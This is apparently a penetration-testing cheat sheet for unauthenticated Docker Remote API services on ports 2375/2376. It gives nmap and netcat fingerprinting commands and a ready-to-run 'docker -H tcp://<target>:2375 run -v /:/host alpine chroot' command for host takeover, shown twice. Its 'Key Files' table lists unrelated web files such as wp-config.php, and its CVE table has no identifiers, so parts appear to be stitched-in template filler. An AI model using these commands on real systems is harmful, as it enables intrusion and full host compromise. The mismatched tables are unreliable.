Docker API
Docker DaemonDocker Remote APIdockerd
The Docker API exposes container management capabilities. Unauthenticated access allows creating privileged containers, mounting host filesystems, and escaping to the host.
Ports
| Port | Protocol | Description |
|---|---|---|
| 2375 | tcp | Docker API (unencrypted) |
| 2376 | tcp | Docker API (TLS) |
Fingerprints
| Banner / Probe | Expected Response |
|---|---|
nmap -sV -p <port> <target> | Service banner and version info |
nc -nv <target> <port> | Raw banner grab |
Key Files
| Path | Description |
|---|---|
.env | Environment variables with API keys and DB creds |
config.php | Application configuration file |
wp-config.php | WordPress database credentials |
web.config | IIS configuration file |
.git/config | Git repository configuration |
robots.txt | Disallowed paths (information disclosure) |
sitemap.xml | URL structure enumeration |
Default Credentials
| Username | Password | Context |
|---|---|---|
— | (none) | No authentication by default |
Known CVEs
| Identifier | Type | Description |
|---|---|---|
— | PE | Container escape via privileged mode |
— | RCE | Host file system mount |
Exploitation Primitives
| Technique | Tool / Command | Result |
|---|---|---|
| Container Create | docker -H tcp://<target>:2375 run -it --rm -v /:/host alpine chroot /host sh | Host filesystem access |
| Existing Containers | docker -H tcp://<target>:2375 ps -a | List all containers |
Notes
Exposing Docker API on TCP (2375/2376) without TLS is an instant host compromise.
Privileged container + host filesystem mount = full host root access.
`docker -H tcp://<target>:2375 run -it --rm -v /:/mnt alpine chroot /mnt sh`
Seen on
ShodanCensysFOFAZoomEye
References